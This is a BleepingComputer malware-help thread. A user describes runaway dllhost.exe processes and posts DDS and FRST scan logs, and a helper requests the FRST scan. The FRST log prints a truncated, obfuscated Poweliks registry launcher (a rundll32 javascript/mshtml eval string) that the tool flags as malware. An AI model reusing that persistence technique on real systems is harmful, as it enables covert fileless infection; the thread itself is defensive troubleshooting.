Jump to content


 


Register a free account to unlock additional features at BleepingComputer.com
Welcome to BleepingComputer, a free community where people like yourself come together to discuss and learn how to use their computers. Using the site is easy and fun. As a guest, you can browse and view the various discussions in the forums, but can not create a new topic or reply to an existing one unless you are logged in. Other benefits of registering an account are subscribing to topics and forums, creating a blog, and having no ads shown anywhere on the site.


Click here to Register a free account now! or read our Welcome Guide to learn how to use this site.

Photo

Process keeps repeating itself: dllhost.exe *32


  • This topic is locked This topic is locked
10 replies to this topic

#1 icelore

icelore

  • Members
  • 5 posts
  • OFFLINE
  •  
  • Local time:03:43 PM

Posted 03 August 2014 - 03:54 AM

Hi all, I'm having an issue that I've never ran into before that I'm hoping you can help with.  My computer is running fine, I keep it pretty clean, but I have some kind of malware that I can't even find, let alone remove. 

 

I have a process that keeps multiplying.  Left unchecked, it will multiply to the point where it is using all available memory.  I'm talking 300+ incidences of the process, and the longer they run, the more memory they use up. 

 

Here's a sample image of my Task Manager with a few of the processes just getting started:

24wdjt2.jpg

 

I sat down and really picked apart my compo today trying to figure out where it's coming from.  MalwareBytes, ADWCleaner, and HitmanPro flagged the usual tracking cookies and a few innocuous things, but that's it.  I'm clean in safe mode too.  I did enable MalwareBytes to give me real time notifications today though, to see if I could catch anything, and I found an outbound website connection attempt that coinsides with the buildup of the dllhost.exe processes.  MWB is blocking the connection attempt, but the process are still piling up.  When MalwareBytes is not blocking this and it goes thought (I suppose that's what happens?), the dllhost.exe *32 still builds up, but nothing else happens that I can see.  It's just a transfer of information as the internet doesn't open, or redirect, or anything like that.

 

Here's a screen cap of the blocked website:

xe4rvn.jpg

 

I have noticed that with the processes, even though they are all labeled the same, there is one "master" process.  I can kill them all by hand using End Process via the Task Manager, and regardless of if there are 3 or 300, I will eventually find one that will take all the rest of them with it.  It's a guessing game which it is though, as they are identical.  If I kill them all, they stop for a while, but eventually the website will attempt to connect again and they begin building up.

 

Hopefully someone can help me make this stop! Thank you in advance.

 

~~~

 

DDS (Ver_2012-11-20.01) - NTFS_AMD64
Internet Explorer: 9.0.8112.16421  BrowserJavaVersion: 10.60.2
Run by Ice at 3:23:07 on 2014-08-03
Microsoft Windows 7 Home Premium   6.1.7601.1.1252.1.1033.18.12279.10030 [GMT -5:00]
.
SP: Windows Defender *Enabled/Outdated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
.
============== Running Processes ===============
.
C:\Windows\system32\lsm.exe
C:\Windows\system32\svchost.exe -k DcomLaunch
C:\Windows\system32\svchost.exe -k RPCSS
C:\Windows\system32\atiesrxx.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
C:\Windows\system32\svchost.exe -k netsvcs
C:\Windows\system32\svchost.exe -k LocalService
C:\Windows\system32\atieclxx.exe
C:\Windows\system32\svchost.exe -k NetworkService
C:\Windows\System32\spoolsv.exe
C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
C:\Program Files\Bonjour\mDNSResponder.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation
C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamscheduler.exe
C:\Windows\system32\taskhost.exe
C:\Windows\system32\Dwm.exe
C:\Windows\Explorer.EXE
C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamservice.exe
C:\Windows\system32\svchost.exe -k imgsvc
C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
C:\Program Files (x86)\Malwarebytes Anti-Malware\mbam.exe
C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSvcM.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted
C:\Program Files (x86)\Google\Drive\googledrivesync.exe
C:\Program Files\Windows Sidebar\sidebar.exe
C:\Program Files (x86)\iTunes\iTunesHelper.exe
C:\Program Files (x86)\Google\Drive\googledrivesync.exe
C:\Windows\system32\SearchIndexer.exe
C:\Program Files\iPod\bin\iPodService.exe
C:\Program Files\Windows Media Player\wmpnetwk.exe
C:\Windows\System32\svchost.exe -k LocalServicePeerNet
C:\Windows\syswow64\dllhost.exe
C:\Program Files (x86)\Mozilla Firefox\firefox.exe
C:\Windows\system32\taskmgr.exe
C:\Program Files (x86)\Mozilla Firefox\plugin-container.exe
C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerPlugin_14_0_0_145.exe
C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerPlugin_14_0_0_145.exe
C:\Windows\SysWOW64\DllHost.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
C:\Program Files (x86)\Intel\Intel® Rapid Storage Technology\IAStorDataMgrSvc.exe
C:\Windows\system32\sppsvc.exe
C:\Windows\System32\svchost.exe -k secsvcs
C:\Windows\syswow64\dllhost.exe
C:\Windows\syswow64\dllhost.exe
C:\Windows\syswow64\dllhost.exe
C:\Windows\syswow64\dllhost.exe
C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\System32\cscript.exe
.
============== Pseudo HJT Report ===============
.
uStart Page = about:blank
uSearch Bar = Preserve
mStart Page = about:blank
mDefault_Page_URL = hxxp://www.google.com
mWinlogon: Userinit = userinit.exe
BHO: Java™ Plug-In SSV Helper: {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files (x86)\Java\jre7\bin\ssv.dll
BHO: Windows Live ID Sign-in Helper: {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll
BHO: Java™ Plug-In 2 SSV Helper: {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files (x86)\Java\jre7\bin\jp2ssv.dll
uRun: [GoogleDriveSync] "C:\Program Files (x86)\Google\Drive\googledrivesync.exe" /autostart
uRun: [Sidebar] C:\Program Files\Windows Sidebar\sidebar.exe /autoRun
mRun: [iTunesHelper] "C:\Program Files (x86)\iTunes\iTunesHelper.exe"
StartupFolder: C:\Users\Ice\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CurseClientStartup.ccip
mPolicies-Explorer: NoActiveDesktop = dword:1
mPolicies-Explorer: NoActiveDesktopChanges = dword:1
mPolicies-System: ConsentPromptBehaviorAdmin = dword:5
mPolicies-System: ConsentPromptBehaviorUser = dword:3
mPolicies-System: EnableUIADesktopToggle = dword:0
IE: {219C3416-8CB2-491a-A3C7-D9FCDDC9D600} - {5F7B1267-94A9-47F5-98DB-E99415F33AEC} - C:\Program Files (x86)\Windows Live\Writer\WriterBrowserExtension.dll
TCP: NameServer = 75.75.75.75 75.75.76.76
TCP: Interfaces\{AB53DCD1-C6D0-437C-BEB9-F17A9907EC0D} : DHCPNameServer = 75.75.75.75 75.75.76.76
Handler: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\Program Files (x86)\Common Files\Skype\Skype4COM.dll
Handler: wlpg - {E43EF6CD-A37A-4A9B-9E6F-83F89B8E6324} - C:\Program Files (x86)\Windows Live\Photo Gallery\AlbumDownloadProtocolHandler.dll
SSODL: WebCheck - <orphaned>
x64-mStart Page = about:blank
x64-BHO: Windows Live ID Sign-in Helper: {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll
x64-Handler: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - <orphaned>
x64-Handler: wlpg - {E43EF6CD-A37A-4A9B-9E6F-83F89B8E6324} - <orphaned>
x64-SSODL: WebCheck - <orphaned>
.
================= FIREFOX ===================
.
FF - ProfilePath - C:\Users\Ice\AppData\Roaming\Mozilla\Firefox\Profiles\rxekvrwp.default-1407025147172\
FF - prefs.js: browser.startup.homepage - hxxps://www.google.com/search?q=weather+willowbrook%2C+il&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-a&channel=sb
FF - plugin: C:\Program Files (x86)\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll
FF - plugin: C:\Program Files (x86)\Java\jre7\bin\dtplugin\npdeployJava1.dll
FF - plugin: C:\Program Files (x86)\Java\jre7\bin\plugin2\npjp2.dll
FF - plugin: c:\Program Files (x86)\Microsoft Silverlight\5.1.30214.0\npctrlui.dll
FF - plugin: C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll
FF - plugin: C:\Windows\SysWOW64\Adobe\Director\np32dsw_1209149.dll
FF - plugin: C:\Windows\SysWOW64\Adobe\Director\np32dsw_1213153.dll
FF - plugin: C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_14_0_0_145.dll
.
============= SERVICES / DRIVERS ===============
.
R0 PxHlpa64;PxHlpa64;C:\Windows\System32\drivers\PxHlpa64.sys [2011-8-18 55856]
R2 AMD External Events Utility;AMD External Events Utility;C:\Windows\System32\atiesrxx.exe [2014-4-17 239616]
R2 clr_optimization_v4.0.30319_32;Microsoft .NET Framework NGEN v4.0.30319_X86;C:\WINDOWS\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe [2012-7-9 104912]
R2 clr_optimization_v4.0.30319_64;Microsoft .NET Framework NGEN v4.0.30319_X64;C:\WINDOWS\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe [2012-7-9 123856]
R2 IAStorDataMgrSvc;Intel® Rapid Storage Technology;C:\Program Files (x86)\Intel\Intel® Rapid Storage Technology\IAStorDataMgrSvc.exe [2011-8-18 13336]
R2 MBAMScheduler;MBAMScheduler;C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamscheduler.exe [2014-8-2 1809720]
R2 MBAMService;MBAMService;C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamservice.exe [2014-8-2 860472]
R3 AtiHDAudioService;AMD Function Driver for HD Audio Service;C:\Windows\System32\drivers\AtihdW76.sys [2013-12-19 94720]
R3 MBAMProtector;MBAMProtector;C:\Windows\System32\drivers\mbam.sys [2014-2-22 25816]
R3 MBAMSwissArmy;MBAMSwissArmy;C:\Windows\System32\drivers\MBAMSwissArmy.sys [2014-8-2 122584]
R3 MBAMWebAccessControl;MBAMWebAccessControl;C:\Windows\System32\drivers\mwac.sys [2014-8-2 63704]
R3 RSUSBSTOR;RtsUStor.Sys Realtek USB Card Reader;C:\Windows\System32\drivers\RtsUStor.sys [2011-8-18 242720]
R3 RTL8167;Realtek 8167 NT Driver;C:\Windows\System32\drivers\Rt64win7.sys [2011-8-18 295424]
S2 SkypeUpdate;Skype Updater;C:\Program Files (x86)\Skype\Updater\Updater.exe [2013-10-23 172192]
S3 DAUpdaterSvc;Dragon Age: Origins - Content Updater;C:\Program Files (x86)\Dragon Age\bin_ship\daupdatersvc.service.exe [2009-12-15 25832]
S3 McComponentHostService;McAfee Security Scan Component Host Service;C:\Program Files (x86)\McAfee Security Scan\3.8.150\McCHSvc.exe [2014-4-9 235696]
S3 PCDSRVC{1E208CE0-FB7451FF-06020101}_0;PCDSRVC{1E208CE0-FB7451FF-06020101}_0 - PCDR Kernel Mode Service Helper Driver;C:\Program Files\Dell Support Center\pcdsrvc_x64.pkms [2011-3-18 25072]
S3 TsUsbFlt;TsUsbFlt;C:\Windows\System32\drivers\TsUsbFlt.sys [2010-11-20 59392]
S3 TsUsbGD;Remote Desktop Generic USB Device;C:\Windows\System32\drivers\TsUsbGD.sys [2010-11-20 31232]
S3 USBAAPL64;Apple Mobile USB Driver;C:\Windows\System32\drivers\usbaapl64.sys [2012-12-13 54784]
S4 wlcrasvc;Windows Live Mesh remote connections service;C:\Program Files\Windows Live\Mesh\wlcrasvc.exe [2010-9-22 57184]
.
=============== Created Last 30 ================
.
2014-08-03 02:52:19    --------    d-----w-    C:\Windows\ERUNT
2014-08-03 02:51:47    12872    ----a-w-    C:\Windows\System32\bootdelete.exe
2014-08-03 02:41:03    --------    d-----w-    C:\Users\Ice\AppData\Local\CrashDumps
2014-08-03 02:34:16    29160    ----a-w-    C:\Windows\SysWow64\drivers\TrueSight.sys
2014-08-03 02:34:16    --------    d-----w-    C:\ProgramData\RogueKiller
2014-08-03 01:40:40    --------    d-----w-    C:\FRST
2014-08-03 00:30:24    536576    ----a-w-    C:\Windows\SysWow64\sqlite3.dll
2014-08-03 00:26:51    --------    d-----w-    C:\Program Files\HitmanPro
2014-08-03 00:26:32    --------    d-----w-    C:\ProgramData\HitmanPro
2014-08-03 00:24:39    --------    d-----w-    C:\AdwCleaner
2014-08-02 22:21:13    122584    ----a-w-    C:\Windows\System32\drivers\MBAMSwissArmy.sys
2014-08-02 22:20:51    91352    ----a-w-    C:\Windows\System32\drivers\mbamchameleon.sys
2014-08-02 22:20:51    63704    ----a-w-    C:\Windows\System32\drivers\mwac.sys
2014-08-02 22:20:51    --------    d-----w-    C:\Program Files (x86)\Malwarebytes Anti-Malware
2014-08-02 21:59:39    --------    d-----w-    C:\ProgramData\BitDefender
2014-08-02 21:55:27    --------    d-----w-    C:\Program Files\Lavasoft
2014-08-01 04:32:19    --------    d-----w-    C:\ProgramData\34BE82C4-E596-4e99-A191-52C6199EBF69
2014-08-01 04:32:19    --------    d-----w-    C:\Program Files\iTunes
2014-08-01 04:32:19    --------    d-----w-    C:\Program Files\iPod
2014-08-01 04:32:19    --------    d-----w-    C:\Program Files (x86)\iTunes
2014-08-01 04:30:56    --------    d-----w-    C:\Program Files\Bonjour
2014-08-01 04:30:56    --------    d-----w-    C:\Program Files (x86)\Bonjour
2014-07-23 20:29:46    --------    d-----w-    C:\Users\Ice\AppData\Local\Packages
2014-07-23 20:29:46    --------    d-----w-    C:\ProgramData\1d41b52c7ef528a8
2014-07-23 20:29:45    --------    d-----w-    C:\Users\Ice\AppData\Local\Comodo
2014-07-17 15:07:57    --------    d-----w-    C:\ProgramData\Riot Games
2014-07-12 06:26:51    --------    d-----w-    C:\Program Files (x86)\Awakening - The Sunhook Spire
2014-07-12 03:37:06    --------    d-----w-    C:\Users\Ice\AppData\Roaming\Rainbow
2014-07-12 02:03:42    --------    d-----w-    C:\Program Files (x86)\Awakening - The Skyward Castle
2014-07-12 02:02:14    --------    d-----w-    C:\Users\Ice\AppData\Roaming\Digital Quarter
2014-07-12 01:57:21    --------    d-----w-    C:\Program Files (x86)\Awakening - The Goblin Kingdom
2014-07-12 00:45:05    --------    d-----w-    C:\Users\Ice\AppData\Roaming\Nevosoft
2014-07-11 20:44:34    --------    d-----w-    C:\Users\Ice\AppData\Roaming\LestaStudio
2014-07-11 17:16:09    --------    d-----w-    C:\Users\Ice\AppData\Roaming\northern_tale_bfg_en
2014-07-11 14:36:06    --------    d-----w-    C:\Program Files (x86)\Awakening - Moonfell Wood
2014-07-11 14:35:33    --------    d-----w-    C:\Program Files (x86)\Amulet of Time - Shadow of la Rochelle
2014-07-11 14:34:04    --------    d-----w-    C:\Program Files (x86)\Awakening Kingdoms
2014-07-11 14:32:27    --------    d-----w-    C:\Program Files (x86)\Northern Tale
2014-07-11 14:31:56    --------    d-----w-    C:\Program Files (x86)\Royal Envoy 3
2014-07-11 14:24:00    --------    d-----w-    C:\Program Files (x86)\Dark Manor - A Hidden Object Mystery
.
==================== Find3M  ====================
.
2014-07-09 01:39:06    71344    ----a-w-    C:\Windows\SysWow64\FlashPlayerCPLApp.cpl
2014-07-09 01:39:06    699056    ----a-w-    C:\Windows\SysWow64\FlashPlayerApp.exe
2014-05-12 12:25:56    25816    ----a-w-    C:\Windows\System32\drivers\mbam.sys
2014-05-07 20:02:43    98216    ----a-w-    C:\Windows\SysWow64\WindowsAccessBridge-32.dll
.
============= FINISH:  3:24:06.10 ===============
 

 

 

Attached Files



BC AdBot (Login to Remove)

 


m

#2 aharonov

aharonov

  • Malware Response Team
  • 2,441 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:10:43 PM

Posted 03 August 2014 - 04:09 AM

Hi there,

please run a FRST scan:


Please download Farbar Recovery Scan Tool and save it to your Desktop.
  • Start FRST with administator privileges.
  • Make sure the option Addition.txt is checked and press the Scan button.
  • When finished, FRST will produce two logs (FRST.txt and Addition.txt) in the same directory the tool was run from.
  • Please copy and paste these logs in your next reply.


#3 icelore

icelore
  • Topic Starter

  • Members
  • 5 posts
  • OFFLINE
  •  
  • Local time:03:43 PM

Posted 03 August 2014 - 04:12 AM

Scan result of Farbar Recovery Scan Tool (FRST.txt) (x64) Version: 02-08-2014
Ran by Ice (administrator) on FROSTBYTE on 03-08-2014 04:10:47
Running from C:\Users\Ice\Desktop
Platform: Windows 7 Home Premium Service Pack 1 (X64) OS Language: English (United States)
Internet Explorer Version 9
Boot Mode: Normal

The only official download link for FRST:
Download link for 32-Bit version: http://www.bleepingcomputer.com/download/farbar-recovery-scan-tool/dl/81/
Download link for 64-Bit Version: http://www.bleepingcomputer.com/download/farbar-recovery-scan-tool/dl/82/
Download link from any site other than Bleeping Computer is unpermitted or outdated.
See tutorial for FRST: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(AMD) C:\WINDOWS\System32\atiesrxx.exe
(AMD) C:\WINDOWS\System32\atieclxx.exe
(Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
(Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
(Malwarebytes Corporation) C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamscheduler.exe
(Malwarebytes Corporation) C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamservice.exe
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
(Malwarebytes Corporation) C:\Program Files (x86)\Malwarebytes Anti-Malware\mbam.exe
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVCM.EXE
(Google) C:\Program Files (x86)\Google\Drive\googledrivesync.exe
(Microsoft Corporation) C:\Program Files\Windows Sidebar\sidebar.exe
(Apple Inc.) C:\Program Files (x86)\iTunes\iTunesHelper.exe
(Google) C:\Program Files (x86)\Google\Drive\googledrivesync.exe
(Apple Inc.) C:\Program Files\iPod\bin\iPodService.exe
(Microsoft Corporation) C:\WINDOWS\SysWOW64\dllhost.exe
(Mozilla Corporation) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
(Microsoft Corporation) C:\WINDOWS\System32\taskmgr.exe
(Adobe Systems, Inc.) C:\WINDOWS\SysWOW64\Macromed\Flash\FlashPlayerPlugin_14_0_0_145.exe
(Adobe Systems, Inc.) C:\WINDOWS\SysWOW64\Macromed\Flash\FlashPlayerPlugin_14_0_0_145.exe
(Microsoft Corporation) C:\WINDOWS\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
(Microsoft Corporation) C:\WINDOWS\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Rapid Storage Technology\IAStorDataMgrSvc.exe
(Farbar) C:\Users\Ice\Desktop\FarBar.exe


==================== Registry (Whitelisted) ==================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM-x32\...\Run: [iTunesHelper] => C:\Program Files (x86)\iTunes\iTunesHelper.exe [152392 2014-07-08] (Apple Inc.)
HKU\S-1-5-21-3699948125-3592849413-3750068687-1000\...\Run: [GoogleDriveSync] => C:\Program Files (x86)\Google\Drive\googledrivesync.exe [24477056 2014-06-27] (Google)
HKU\S-1-5-21-3699948125-3592849413-3750068687-1000\...\MountPoints2: {9304d5c0-634a-11e3-95b1-b8ac6fffdb81} - E:\LaunchU3.exe -a
HKU\S-1-5-21-3699948125-3592849413-3750068687-1000\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 239 more characters). <==== Poweliks!
Startup: C:\Users\Ice\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CurseClientStartup.ccip ()
ShellIconOverlayIdentifiers: GDriveBlacklistedOverlay -> {81539FE6-33C7-4CE7-90C7-1C7B8F2F2D42} => C:\Program Files (x86)\Google\Drive\googledrivesync64.dll (Google)
ShellIconOverlayIdentifiers: GDriveSharedEditOverlay -> {81539FE6-33C7-4CE7-90C7-1C7B8F2F2D44} => C:\Program Files (x86)\Google\Drive\googledrivesync64.dll (Google)
ShellIconOverlayIdentifiers: GDriveSharedViewOverlay -> {81539FE6-33C7-4CE7-90C7-1C7B8F2F2D43} => C:\Program Files (x86)\Google\Drive\googledrivesync64.dll (Google)
ShellIconOverlayIdentifiers: GDriveSyncedOverlay -> {81539FE6-33C7-4CE7-90C7-1C7B8F2F2D40} => C:\Program Files (x86)\Google\Drive\googledrivesync64.dll (Google)
ShellIconOverlayIdentifiers: GDriveSyncingOverlay -> {81539FE6-33C7-4CE7-90C7-1C7B8F2F2D41} => C:\Program Files (x86)\Google\Drive\googledrivesync64.dll (Google)
GroupPolicy: Group Policy on Chrome detected <======= ATTENTION

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = about:blank
StartMenuInternet: IEXPLORE.EXE - iexplore.exe
BHO: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corp.)
BHO-x32: Java™ Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre7\bin\ssv.dll (Oracle Corporation)
BHO-x32: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corp.)
BHO-x32: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre7\bin\jp2ssv.dll (Oracle Corporation)
Handler-x32: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\Program Files (x86)\Common Files\Skype\Skype4COM.dll (Skype Technologies)
Tcpip\Parameters: [DhcpNameServer] 75.75.75.75 75.75.76.76

FireFox:
========
FF ProfilePath: C:\Users\Ice\AppData\Roaming\Mozilla\Firefox\Profiles\rxekvrwp.default-1407025147172
FF Homepage: https://www.google.com/search?q=weather+willowbrook%2C+il&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-a&channel=sb
FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF64_14_0_0_145.dll ()
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.30214.0\npctrl.dll ( Microsoft Corporation)
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_14_0_0_145.dll ()
FF Plugin-x32: @adobe.com/ShockwavePlayer -> C:\Windows\SysWOW64\Adobe\Director\np32dsw_1213153.dll (Adobe Systems, Inc.)
FF Plugin-x32: @Apple.com/iTunes,version=1.0 -> C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll ()
FF Plugin-x32: @java.com/DTPlugin,version=10.60.2 -> C:\Program Files (x86)\Java\jre7\bin\dtplugin\npDeployJava1.dll (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=10.60.2 -> C:\Program Files (x86)\Java\jre7\bin\plugin2\npjp2.dll (Oracle Corporation)
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files (x86)\Microsoft Silverlight\5.1.30214.0\npctrl.dll ( Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3502.0922 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3508.1109 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF Plugin-x32: @pandonetworks.com/PandoWebPlugin -> C:\Program Files (x86)\Pando Networks\Media Booster\npPandoWebPlugin.dll No File
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.24.15\npGoogleUpdate3.dll No File
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.24.15\npGoogleUpdate3.dll No File
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)

Chrome:
=======
Error reading preferences. Please check "preferences" file for possible corruption. <======= ATTENTION
CHR HKLM\SOFTWARE\Policies\Google: Policy restriction <======= ATTENTION

==================== Services (Whitelisted) =================

(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)

R2 MBAMScheduler; C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamscheduler.exe [1809720 2014-05-12] (Malwarebytes Corporation)
R2 MBAMService; C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamservice.exe [860472 2014-05-12] (Malwarebytes Corporation)
S3 McComponentHostService; C:\Program Files (x86)\McAfee Security Scan\3.8.150\McCHSvc.exe [235696 2014-04-09] (McAfee, Inc.)
S2 gupdate; "C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /svc [X]
S3 gupdatem; "C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /medsvc [X]

==================== Drivers (Whitelisted) ====================

(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)

R3 MBAMProtector; C:\Windows\system32\drivers\mbam.sys [25816 2014-05-12] (Malwarebytes Corporation)
R3 MBAMSwissArmy; C:\Windows\system32\drivers\MBAMSwissArmy.sys [122584 2014-08-03] (Malwarebytes Corporation)
R3 MBAMWebAccessControl; C:\Windows\system32\drivers\mwac.sys [63704 2014-05-12] (Malwarebytes Corporation)
S3 Serial; C:\Windows\system32\drivers\serial.sys [94208 2009-07-13] (Brother Industries Ltd.)
U3 TrueSight; C:\WINDOWS\SysWOW64\drivers\TrueSight.sys [29160 2014-08-02] ()
S3 PCDSRVC{1E208CE0-FB7451FF-06020101}_0; \??\c:\program files\dell support center\pcdsrvc_x64.pkms [X]

==================== NetSvcs (Whitelisted) ===================

(If an item is included in the fixlist, it will be removed from the registry. Any associated file could be listed separately to be moved.)


==================== One Month Created Files and Folders ========

(If an entry is included in the fixlist, the file\folder will be moved.)

2014-08-03 04:10 - 2014-08-03 04:10 - 00009941 _____ () C:\Users\Ice\Desktop\FRST.txt
2014-08-03 03:24 - 2014-08-03 03:26 - 00012152 _____ () C:\Users\Ice\Desktop\dds.txt
2014-08-03 03:24 - 2014-08-03 03:26 - 00006754 _____ () C:\Users\Ice\Desktop\attach.txt
2014-08-03 03:17 - 2014-08-03 03:17 - 00000000 ____D () C:\Users\Ice\Desktop\New folder
2014-08-03 03:02 - 2014-08-03 03:02 - 00688992 ____R (Swearware) C:\Users\Ice\Desktop\dds.com
2014-08-02 21:57 - 2014-08-02 21:57 - 00001924 _____ () C:\Users\Ice\Desktop\JRT.txt
2014-08-02 21:52 - 2014-08-02 21:52 - 00000000 ____D () C:\Windows\ERUNT
2014-08-02 21:51 - 2014-08-02 21:51 - 00012872 _____ (SurfRight B.V.) C:\Windows\system32\bootdelete.exe
2014-08-02 21:41 - 2014-08-02 21:41 - 00000000 ____D () C:\Users\Ice\AppData\Local\CrashDumps
2014-08-02 21:34 - 2014-08-02 23:24 - 00029160 _____ () C:\Windows\SysWOW64\Drivers\TrueSight.sys
2014-08-02 21:34 - 2014-08-02 21:34 - 00000000 ____D () C:\ProgramData\RogueKiller
2014-08-02 21:33 - 2014-08-02 21:34 - 04806744 _____ () C:\Users\Ice\Desktop\RogueKiller.exe
2014-08-02 21:24 - 2014-08-02 23:22 - 00065253 _____ () C:\Users\Ice\Desktop\Shortcut.txt
2014-08-02 21:23 - 2014-08-02 23:22 - 00032874 _____ () C:\Users\Ice\Desktop\Addition.txt
2014-08-02 20:41 - 2014-08-02 20:41 - 01016261 _____ (Thisisu) C:\Users\Ice\Desktop\JRT.exe
2014-08-02 20:41 - 2014-08-02 20:41 - 00000000 ____D () C:\Users\Ice\Desktop\RK_Quarantine
2014-08-02 20:40 - 2014-08-03 04:10 - 00000000 ____D () C:\FRST
2014-08-02 20:40 - 2014-08-02 20:40 - 02094080 _____ (Farbar) C:\Users\Ice\Desktop\FarBar.exe
2014-08-02 20:21 - 2014-08-02 20:21 - 00005338 _____ () C:\Windows\system32\.crusader
2014-08-02 19:30 - 2010-08-30 08:34 - 00536576 _____ (SQLite Development Team) C:\Windows\SysWOW64\sqlite3.dll
2014-08-02 19:28 - 2014-08-02 19:28 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\HitmanPro
2014-08-02 19:26 - 2014-08-02 20:21 - 00000000 ____D () C:\ProgramData\HitmanPro
2014-08-02 19:26 - 2014-08-02 19:28 - 00001859 _____ () C:\Users\Public\Desktop\HitmanPro.lnk
2014-08-02 19:26 - 2014-08-02 19:26 - 00000000 ____D () C:\Program Files\HitmanPro
